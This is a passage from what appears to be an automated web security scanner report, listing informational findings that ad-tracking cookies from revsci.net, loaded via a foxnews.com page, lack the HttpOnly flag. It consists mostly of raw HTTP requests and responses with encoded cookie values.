Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF50OBL3IQT5v7foPYsPevS4OR0KNpBWaN1JDo1zU0ubO+9OLE5ntq0/AjloMpK22+U98p6XRuQkV6vbR8HQhJyal/eeQNvllZtPuZet2ARw7v6ZzuM6E0aUO83uYeBaSgzoIOkJtKzgPSBYCT8mIKXc9qOf0xNF3EQH79I2WYh5GTmoLoX+0crhe7eBwnVRDBVg0GcVoinrWEhPqFGfARbf3+k3i5NsM/ENgHEgGnkWEROLIVxV1KDQHR8lDHrTVSLs+6Onq/hm2XeMZNJuhFuRz6DLOOEG18FVYPoTtRdrWDxpyJLESSzGkSiHrpaEI=; rtc_nJDN=MLsv8SMucB5j5hAH0vmC/252VHiLIgT9sbGvQkQvgrafLIBiBEREiMw9JMHYtmWAML6kTuNHWEhy9hojbdls+dquwaa5GuMToA3eQeIOKZU4EPLYIyw/1PF5b3337mlJR4MFicB6+ZhO4eo2hIosgeRPF1VsnEwSW73nLGe8/i9Fx925s2s5IqolwaPstmdeLowJqlIYdQ2l5XhdhHdkaxQvMw0eLcHsQ1mVT8azUmBbvyo/Cw6yNsQc4SsNfFGkesd1eUewEe1KFcSACCYGCX7PqHiCqh6JpcY3Xecg42q2j0Nb3H+oR/930ZfKST54xVszS/4aMJzKqAH0raB0p9t9kyBANRK56/5sDFV5v3gPUuIQrv12o3AZh2JKsvhbcS8oB8bsiS3iFlBeBhFQMXVeMoS1C1NjSBDpUHXi0ILIPeIjTtrWUgq4W2ZgGPlrvKgYwRx04vWr7RqamvgBSsOZkiq3KItyJkA6gszT33rHfwJ1wsam6ahy12FPJRWnA15T5vdg4Z+riVZhzvuy; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6pbNmEREzM5uAkEsBEzbqEBjKmOxigTwd3Jm/a81YhltY+GVTu54epWIHf3oi1YHPA5mRwJx+S5OA5wH52YG00IY1gV2MfhXAnM8HrWnIYxgAti1CcJVLGWcatFKzsmuyD2sgaUns7MtMICDCCUI21K9mC3TU2Yj/q7kFyEiC9qd6iQZWUAOqbl4SiLlDZEbKHOPxQcwD2OO8AA22wiW8ixPSzGRb4p7YFvfyBk64IHbuLC6WKdvP9jXxKgAf4NTe3tjcO++99eJjQFJ9rb7OBau9lrmeaQxVwIj8pBOIjk9At1gWBBaniY6oEmHPso/5dLFYI41YY3i9qHRnWpzXTOgVAj42EJDEGS6vctRKcNFAiCEMZjBcZHVvt2laXJQlK59Srh7s7SBL4dLkSAcPQ3Rt6OTpHPLJptvHwTthDTg5+J9WOk59LQz9b66o/rLUTQUmwl4Ic0uouuQhfmSI/a8X29UwYo8sbIG3ONlKgg/Kqmo3cLl9i+tGjb6XydXH6f3ucPvEQYtt2BNVV0EfWqruc+eQLmitkxseBiCsvQS2hUBGND7uZdFI0owNCOUwWdC97/953WhT3REpDfgVvh+jIs45SZQnFlgPiMyfOlHlQ7WNHSe1+QBVVgnWw182djaAuxROHS8I3BCrEZi4d/BfU2FS/KyPooQ0EAv4Yy72wdytELJmcob/G1DPx2+NrESVh9tsdFVNWFSqx7ZofP8aj3L3KrXj8iD/8cfSWrT68uNSXimA6BAeiO0cGtgbsV/Ox0TAb4JnY3Z+WGp/9eF2KiVH6pi2c3yya9KESMyStLPL3cidKvwb7CwQDzdaB/TwhJiNXR1HxDiinMeVvomx0vjdN7XTrT1+O4Lv9WAGOONzEG9xBCxrFPy8W6v6I5SB6SbecDqFNAMrbuC9DwMA2GpdEbq22RostjaDN6Qa/OK+oqwE0FVdHyjLRr7yw0NTDvDqGk8Snhn/WEqtEBsE1oZ5SI1gDENnVJNIfU9Zy6Jk99abCAYArFBWQEww297LSqd5an4S7J7IbYtJWaxomJU0oClIC/eF/zYu92VmdtrtfCDHjEg21Ul296Sv7oZrz0kQnPr+2nsGnk6pCC9FC9HeUKrA1ih2Eqf759ij2OvucLz1/aCxnOnWbLgYi6ThGi4L8hUgAimXe4s1XmozecrKjkUfyK2/fbJKEyrk=; rsi_us_1000000=pUP1Jk+j/wMU1E0vRTPS2JnZ0DSpp5aLVLEjTHoN5P2iM4eIkHSp85fD17iCQMAW1btYONwq0oTM3buXl/GErwwKoFpABzfHx6S9fEmVBvyz2BYdN52BKcikFxV38nYDN+vL1IYi1vyqEUbmTzcPx7jpc1xf9G0l2Z3cPBmFr55URPk/m9Tts3Ft+ajEUO9cv4wZCYmGMcisG36qD0yP0mfNm2lFnH7hux+IEGEjDH85Poa6RomyoZSI2BXdtdCxNisAaWHg2NTiZf6fRWQePNmsr8mVjmlxeNTHQ1m/lRHtinEi/hKJH3dGS+dC1Vd/E/J7PipH7IKj8sIztBSvtaAHkEtmsMd4dv2n1NkvPNisyym1NjnZu/lSltMeKgJaDASJdC0+FLVr1pK860/L+qinU6RUMeqJGvmGz3L1lHOf4EfPvqsGAn1RX9a4vVMyIHW7y/h4BrAOhT3rBgSFfNQGoneHu0w3WF4/JwQusiX2r3AU0i5d5Ek5oqm+nJbLxjPZ5MQmFun3UHukSC0L4WWRmmymdL4WAtYiFH/s8a0rm2Nme5x3AM2fhJjN1x/Co1/yi+/MtQzq+ReoVAAslQWgb0te4bpDNgZdZmd42itbg91lDxFVWuoVAY7c2RS/5Jgk/Yd261+Ua5QTQ65heg/m2xlM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OFaAIQV6mdYdLAussMD58CRF/K+OevJwd2pKPAsA2HOgBSPAgQrsibp15FkKSjqac2eH0lgGWx+zWRJ7JnHzOpvwOvxoXANvMondmdJTD7RS3gzwstR0oiH3p3Bbz16WYpbU0sXP+0XdEHzuNer6cSTTDsisw5SEmWL73VP9NXv47fO00JfDMOicOHNE2xERNWQ/ByBAj59yEeTj8aCMuBtWnyPBvPBRX1OZ4DdiRRH4iWAamtE8NJipqMevjhWe72UpKTPm+AiLw/ocxqQn3007tmktw8qmiWwrbC9NqaxAsPvZmrEaYJgY6L; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39SUJaSpr557EdtIXqfE3HZxD2jF7YYAV7uTQoXkALe+h8Dca82Rp4QDOVAIGzRVDE7jI/n/4akBaNcbN8GRUBNkmj5UlcEQ1VUbpaqXvbt87W3xwl2cHM3wsktRu41scXZ8P4K7/CdybqhEZldnbou+DbEBGHBKyha7v7WSPvn5H2ajzRPgz+xQVkIUirLn7eE3zJdbKV82vWoQaCvYVOURHMQHF1fAsE+JlNjbmH7mqGg6dncGdZaI/iWbkhlnUJrftAsbyQABUtsCEFy3NIM7+FH9yH5NcRvKmIN17eCO7UsTPVEaZpQ48Tn5e1RCFy+kaz5GeEUfngWa9ba8UO05fHqgzsZJ9OSpZ3JxXTuCVjT4QpZxGdwpU2dyQfQA/8UiMjdKivwgK75eN2Bm7/ACqF+0TjejWTUjuQuNLgvSvyirzN34hblyDsnk93EvhyvSlrUyHPBleVKREww/dq+nPP1uMbRZyKO/H5SW/kNkrOIuzNwAbLIf1Eq3wf9dEPTKndtpfMxVnKBUj2JPmv2ReT0SPEXSCiN1i09KWxU4z8RYZSFL2dcBxyM9m1tKvBTRwCbdz6wn/dLR3FDAqjleSgedz1J++wb1aSs96zQ8MzfAomvRdUq7yMrNnfUPU+QZ/cnfOMO34O/tEL905B5QZNmcoTw8LGVSM14JH4cWSOEZLAozvvToSBOQgDBqEicHstsbBQvM3cCDABTKb9ytfxncOHQ0yBRUa6ka4ckA8U004sydatpOsp8siHUriuCMJ5qV2/WhvmwiuJpREUh0xDs+Aht4fOa6P9rxWXpemVMQFrdtoWlPWdPEMfWRI0AcY2gmTiSREzrknUSHc+EMzg5WQdsDBgZScSvdoatSsUdhEYxqkCNUk+wYyTShamJlepNn4Xj24X5er29wVxdbgVZ2WCm0lrfFa4GeFlajUW46Klr3NLqKVrENE3GDBQSG39/3ag9OXDww9/Vqk6EvVO0hwoJN9k87C8bMuDNLirgdVHgJ4eO2g872g7xHqk9xJpdM4j1ZZjfcnrjsw2FeuD8iVAwTKwXiHdyzWcBQ+6Jc0rRp9OegDv0wqln0P7L2QhdFQpP9LVPQIuMkhyhzqbiLjvr6gOnhzpF8b/EpkY5aV155J0ukKG9r280PyIWxfmk7cQuf9s/01eWi3coe/CofkCdG6/fy3Z2MRg9g=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:09 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 11 Apr 2011 16:21:08 GMT

GIF89a.............!.......,...........D..;
6.116. http://pix04.revsci.net/E05510/b3/0/3/1003161/184358339.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/184358339.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/184358339.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000=pUP1JU2j/wMU1Y1iQBIXbzy7gH/ihA5AE3QfIwz8xaSP/weZt3Sp4nMZBHxN2co0X00La5kI4tNZ1ThMiPe4UvEhzEJiLjLx4QIdzMtmZSAnkdV64YI7k6ngB3ZFtFBLvOO3l29lYEILZQP235tzz7ylPbi0ZCLAdKn/NO6nr7LHUsr0ztY5dAkZvxeeR9vAMcRa784UqE9WHm29W0kIkyxes2nWBfEpdBQjyWI0AzXc6T35kgzh4efWmgHfVamKKMWPczhSf+ff72AHHgdjbN/5KbERi+qWlAj6EeqJfTntI6mLxDhIgOI2RyJiaCyls4P5+xV4npm68sCzFyDr8xCR32AMCNw7ucv9sISCZzDDJovBCl4dex8pqDnBjc9K0U6asnoqYjIt2nGfrgmm/IX8UZchd+xfjA2tHPv8XdqMYNn1xPNktfW1IMWUuYJMkP5nalJMNB+99Hie/N4BmQuzWa1EJha2gPlVxsRWrXZEgRgXr1FKd3X1cDa1UrhiyhqcD1kPPBwjHqKsn4s72LBRjy45G39ZZc1g1ndinyBGR6Kd+KyLXKFs+LWnI1Uzn3FVzFRztk2VE0N535Bkvh3bt/N5vIxnechclQrHwPJkCtDU9qc8eBvj55wjAwRxywsZZVDPh5RPpzsEodtG6DIdhEt0bqa58HDOUe1fwKgtQEdp66qywl7YSK4Di1B9FQeoEXjP6rVGtjf8QFjT5FMwHQ==; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X50BYKwAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKEAqftuIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXCCrXdEH3+Olb6OSMFWO3iaX3U4x5KBzgTdKqo3qP1+dhvPBdk0F6kk5vSO5dZn8zXmFIIN7e94ecrLBjC1dm4+Beh8RjOrAygahDkl6K488pBeeIs09+i8gVnW35eMYMfe+mASkY680T5MHCcSqMvv14GjHCG6MET5ZjA0P1fPCYqxcM7JS1O1tbe1JF3M3dAw=; rtc_JBVL=MLsv8VUusR9n5QgQh+2eD1ty26AgQ+XLMXEmNDUbK5xW2nYekizNLI+Ux4AdIJIvEz27RctNtu160CrFcHVQoKWkTuKSCpNTgbvpjz67BYju6GP6An+lbHIaUOtknXHGOAK+fZEml7dCRGXSwBpNVfDq/TXdwgK+JlBYZE67Zx+21M0S02XA7asVwUth1lXYNhAEExaYdZisiph5OSnf6VxvmIMSpXPp4T8KumNJqNdeCIzm9EL2KtYg7ZrfZFsbKtm17/2aOKtylcUAByZGCb5PqXiHqBrJpAY3WQch5WpGiEJL3KNQf2kiWheqMV/jIumc0t1Rj2vo0lAB0BDSHG45W9vquc56YmBh4OQsy3SW269zAR4Q0dNKS5dYFtvhn1zBUWXsHy7EfWKrrGhIAt2eI3LUEO3qr+WZzD1tst0HBkOfjr8xKHFpE56ynldIDD/7jtnpMaZ2kgW+3CXBMVZ5aj2WNJz757mLJ+9U4RjdHCbwcZxC8lFzlNF3k8pFAX0k3gxu/NOw1EZc3DLfc1eRsow=; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2jF7YYAV7uTQoXkALe+h8IdgKGHlqVer8ks7t0GGuQivKG4y2XF+Szoxs+pgJ0/nH2Ui0s/LZADpaqXvbiZFZ47pAMQHM3wsfNN9cBGbCJGJccifsC6cI4o0hggjHk2vCjLhrtdNN0/FJ9JkGTRSFTRPCuv30GvJxX6MA3P+3IgxfcVau/5rPeFRygZ2Apv13EfP5uwyggle26APHtS97hgJom9QzFmbskdopka+eDqJPhD21kuC7KRRVh96kUCUspZy73DHW3N5Irc/jZGh9PeoeeO5jXKFZIIS7CVGvcGNr73gvTMfodX+B1jFeC+aDEHD5ULvp2Cjj4hdZusIxpUz9t45xvB2KoipTozDoxeFn1uJL0nO/jD9658z+7LiPZScmG8djY7SJW6sQ3pwz25kh+gDhoICW2/qZUhClAdlFa8It9h+Q3bNPRZJcG49HJYoM7vTTaTWkQpmzq5K94UOniBJD1z2FoxkvNta4OXwgArX4hsjIHypbUV+PoPh7+GC/RCblOaZzsp7jwBg68gVKHnnVCE59ss1SuvSo/APWQqFRGAe7Bjr9GcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMN1apbbGRCkUWyLxrOe8U/R9CK2l/UHVw5Tl+hi/uRekDnjtylTaDGVQcT7CVGbZiKgcdH1XMx2WdoUSVh9tuGEXNWFSIx7Zq/yCPRCO71+WdVcdE4N/UzZ52cn7igVQC2Mfo0Hq1iU+pVeqUj0QAL4JkY3VyZCpejOFyJlf/t7v+dFfaiWNpFyd7lOU14UmlJpqxStIb8jJ6R7xY+cFWnJjQmlula/EGacp4DRUM6bEa2NSizHfsjEqgPP4Bafzg3P4mTLsbNAe6Q+9gf00BKr8ScRnxJlEf6oloMey8SuxzcC/4TBklWWbbRjtft8ShFHE0kqP/uQ56C1hw7vwpsjo9Y6RJXldPiQ60QwwL34OKzufyEBAR2MFV6+1vx6BvM5eaTVPb7RwPpjo/0KKUsLcYE7x7eUCTf3MFNteHrCjEaxMD6FiMtLjNopt2etE0t9szMRSyJidCM/VqZ3IsLX/oQkJxExMf8EXMRIy0ud0o+gBaMQVr9erTiDYbs9H/MwPVxPJZhFlmAwkq7o9DbtRIXDB1QcO4bmu2rrCTeVXuPZJgRjOU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JBVL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5ln6LIbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYbHosr+2FiGJnoSu9TOv0Ed0bwH2nbLz+xScNbpzP0FbWylm52l2SrEimlz7VnNrLWtvO3pTkZP4PmzvwD1+ZYLPB6+Yv1VnOADPTNhgQhyidaK4+8X1pwJtE9ZRY2wKO+8M17IRN2vKp+DAHT4wyj363ZVXfWq0eYRtAJYlo/Ri/BL6yJVWFVBJy4P1p7csLIAQP7dBQ=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:11:15 GMT; Path=/
Set-Cookie: rtc_hpqF=MLsv8aVKMT5j5oLEkrhIMohGIOhkT2KrqjTC5Waa85sd3XtYJlhOwG1tfjK7UWmvp+UXB+11jW4pxhvc9EIyKcbf18wDEpPP9J3s63g7N4gnniGrGmYG6i5VHFLqEP1X3/2H7VCrwcXndfedqtqR/qCtqPt+0Q+bTPdy7X8RiP+3VIJDEnzycFgtpSt4FyrYNpWdHZybWfgqNUd84d96t/tOdIoVUoeTNAh0V0yrFDcbJGVrs3NCoUKLL/us5jAPfUQKUkTrPComdnLK11baAPXRgDACqxX152M0Wx6tr6STLNH6Ipn2Za37FPk5D38UmNaFlaeYgvtCOiXAC0hdmtBShNPv+9selQXtPLMtpAvSGnOFdRE5UTzhoa6hsiZkjy3bfoCnFn6kAzCvN0CSBUVTjhduVFNSTojejG7zhUcxLLELAO0+zZWn9k4dxgIaRNpx7k+9tKld56fRWzzi5bDtT9uB3UxAlsyZIUHL2/UrZ4t7jsaW4bBuCK8PdFhIyid8JfdqWso1Sxro/9ulzTKEVwaw+ts=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:11:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:11:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.117. http://pix04.revsci.net/E05510/b3/0/3/1003161/317116761.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/317116761.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/317116761.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000=pUP1JUmj/wMc1Y1iwFPRuygREfL/eSNiaWsWM6so3gd4HwfIp4qMv58DSCGvA0dEdmVGSphZQ8fIbaovkYwFln4eYkopATLN/Z6NLO9/SEJhThUPn3csMfikNTxXZlyFKjGmOvw68AwYuzmk1ytiuXCtXr4kYoguGmnsXsSg57yihsEgM83wt6VmlvvcdrQ3x4QaPU6SxfPlwjfsKx6Oo2D9vASkUyzSVrX3wBBUo0hqSYxC58KnoX9UN4X1kpyaUhWtCW8ORNz8CNbtMB8vWy5E7hueIqAjCDoVGGbmPWBhTXVhqLiAmDlPYMUKotXqtuhtONjDylQaCFHEir/IuwTH6W82k2unh1FKMoiHtJBYM7q1rrLVxUKYqeVqcU6Y+aBSVjM0vHEUr53jD6tTO9RmfiB6vmlTcpbA0727zUR6TCryhcYeKvSovZ2b43EgPXRh3hm7iXwTA61SPnOHThTMzq8DA0um0id786X/KKBM4TOACjQ+CQ+u0mfksyjk1QwJnD+IeliTF5klkfVerttMJH3zAF5irPszYNCuaxotcy5ptln2R1R5HIogSJqlc+9J3+Fid7UXSQVJ7zVbJ1Ck3M8zNO2tYa4nC10W37WZDHkA8QIm5adTmFDtLfrY+/M8mL6ZQFuYeqs9fbbwr9kMbacIVvwqzu/nilqeY8rwOeKa6v+JwEwjuYjK4YhYfuwH8h7GZn7SkAs0lUf5VHY30w==; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5ln6LIbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYbHosr+2FiGJnoSu9TOv0Ed0bwH2nbLz+xScNbpzP0FbWylm4oiMhAYEDcu0WzwG1PEbSsw9vzPCqIlOJ6rlytUwzs0GwMMi6xK+qW+PXp2u8KLNdPshDbiMHXreN4C4CtNT6GPrBjxZfmwwV/z7MRYksCSdoMkmS0zwAk4CbduJcL317Ni6mclCsxRr8gL/ZIAgi6dA4=; rtc_9r6j=MLsv8SNKcR5j5gKpOJPAaM1326Pgb/GNqsTY0NBa85tW2nZ+4HclLI+UJ2ITMNEFEk2HLmH0enhjxzNy9BxliOCugfHcmbJH8Y3cFWcEJkoClbAJNOpXzUZmzifpQzufoP1H7NCkzcTndfddq9oW/qCtqKNe0Q+bXJhy63+RiD8V9pIR02XA7ftd4gt6Fy7YvLatgI+ei0vAChIQd15DgUXLWoixpPVYawV3Flca8b/KKkAFs2NFpgIJTLcxOajJX0T+ISe1UmUP8t0onGfGZRmuQqQRfmW8IvIgl5n1QjVewSFnOZk2ZK27ZPm5RTddB76fAcjxcBRhviEHPY+rnFJE8Cm3PNYWZAEV2YQjpcu42oRWrwM0IAG4zYzzZCP0TJZD4jLuDf0W6jDbW7M2ff57dgeG7NNJiENw884u0XOx5v51YrEHXXGGpOceQzfmTGblCssqneFWbQLGeG7YskyHLS07dK4O+wfpTMwCihN0LcewWMQtbdn3qnEpDQi1zMltbwaPxz5w8Zqq2wPcL+aYaAN4+yE=; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEcLqEBjKmOxig90jsQpPrRW9xUPO7gbf50ex879sHUlxsDSMSyT40d3g9PNkmj5UlcMTLNnXBJEFgefIl9uJ0I0vU47hEyOf8RwAvASPNmI1Ph41Rd5kyzrBMoavoxBfo+f9o94awgHYvDAVMHG7trWQjV8FVvvSHmTjum3X6XmcPzeZ3yadmjjtJ7Kc9GkNNLQ4XsSl77KmyKuIe9bhMCk2cm5+2yScc/SESee/uF/5ZASzKRUgNNAf7S2FOPKrNb3MYEdx44EZy+OVCF6wLyOK0upKsRu5FazY+YpctvvYyjZ5DcDUTeWnmNc+Aw8lfDD4gEAhNTnms1TrgJUtYm9u0OKszQunHTtHpKSmQmZ4gk7W1IHzKTH/Gx1PJfMOjZPf/iIv3wotd8zFUET54ZLeZDKHDJMZePuwsB4OZalv+9MIIRQ1BXEqcEQr7xrmD58aHBz7kVJueYZp8JW/hOoDAOSwfHQ2+ncEPPr23sZQdkqUONCRp1URGfTEI9YL90bxDjNGhjNnObrMpY+innsl5Y29jwm09rChXDu1B7hKxpnB4t0n391lOpIk+C6G+xG06nPck2RADYHAoiMw33PqxWTAlrkQxb7kMt2x0B1kmo54K3075cAj9FMimixp5iYs5mLsCw7whgwQga7EA8xDtS4q+mQJsMPuen4UuRFd9Osx8dAJkcuG+OgBkUgAeGO6ZMDTRvsbmC75vuE8pQEi+sWrdHtYcg4aoUaXUtXoEM61C+Qtasi02PJSVzgt+Tfzcj+Vuug75lbNyEQpiFVWUbedwECQ3hGfVj9wLx3T/m3Bd3h2lMXFgPnAUUFb4k2XPyhbgf0cS5KKowubzVKuru/7TGc8uMc9/Viex8Wy2tyb7tzhFlXuJHlkQz/Kntc5iEIyjb3+OcJvIidMDXZsupJCxfOUT00YlNk0k6oE4hwgJU6ShZA512Byfkq0M4BVW9pnm8JZsoCgo/uh3kkPyzQf4pyMyO/EBCsNYCYTRP36GL3HbGBxlla1+snq9a8/UoSAj4pRnCOMDno7SoXyPzFf4T9PauSfuc+8CnJTpKVMgwZ8BsAwZkJL2z9dxFP/MkDAVfw7jIXQXzkn839hcHYm2vYEenF5uIoyfEoXL3OtuIu2+tgZ16ewjDP4/0PUW4o+4zp7ytKZF8vMGn5Vk5MWaOuRPpJc=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_9r6j=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
